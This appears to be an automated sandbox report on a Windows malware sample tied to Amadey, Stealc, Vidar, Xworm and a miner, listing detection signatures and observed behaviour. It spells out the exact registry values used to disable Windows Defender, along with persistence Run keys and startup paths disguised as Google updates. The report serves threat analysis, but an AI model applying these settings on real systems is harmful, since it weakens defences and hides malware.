Malware Analysis Report

2025-04-03 09:31

Sample ID 250305-3kshtssqy3
Target 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288
SHA256 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288
Tags
amadey gcleaner healer litehttp stealc vidar xworm 092155 ir7am trump bot defense_evasion discovery dropper evasion execution loader persistence rat spyware stealer trojan systembc xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288

Threat Level: Known bad

The file 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288 was found to be: Known bad.

Malicious Activity Summary

amadey gcleaner healer litehttp stealc vidar xworm 092155 ir7am trump bot defense_evasion discovery dropper evasion execution loader persistence rat spyware stealer trojan systembc xmrig miner

Stealc

Detect Xworm Payload

Healer

Stealc family

xmrig

Vidar family

LiteHTTP

GCleaner

Xworm

Modifies Windows Defender DisableAntiSpyware settings

SystemBC

Vidar

Litehttp family

Xmrig family

Detects Healer, an antivirus disabler dropper

Gcleaner family

Healer family

Amadey

Xworm family

Systembc family

Detect Vidar Stealer

Amadey family

Modifies Windows Defender Real-time Protection settings

Modifies Windows Defender TamperProtection settings

Modifies Windows Defender notification settings

XMRig Miner payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Identifies Wine through registry keys

Checks BIOS information in registry

Windows security modification

Reads user/profile data of web browsers

Checks computer location settings

Executes dropped EXE

Reads user/profile data of local email clients

Loads dropped DLL

Drops startup file

.NET Reactor protector

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Checks installed software on the system

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates processes with tasklist

Suspicious use of SetThreadContext

Drops file in Windows directory

Browser Information Discovery

Program crash

Enumerates physical storage devices

Unsigned PE

System Location Discovery: System Language Discovery

Checks processor information in registry

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

Scheduled Task/Job: Scheduled Task

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Modifies system certificate store

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-05 23:34

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-05 23:34

Reported

2025-03-05 23:37

Platform

win7-20240903-en

Max time kernel

150s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer, an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A

Stealc

stealer stealc

Stealc family

stealc

Vidar

stealer vidar

Vidar family

vidar

Xworm

trojan rat xworm

Xworm family

xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3644_133856914229929000\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3644_133856914229929000\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\jLEaFdlg\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\a2a6d35a13.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107910101\\a2a6d35a13.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\a3f26c3fce.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107920101\\a3f26c3fce.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\b668242231.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107930101\\b668242231.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\e16f9098dd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107940101\\e16f9098dd.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
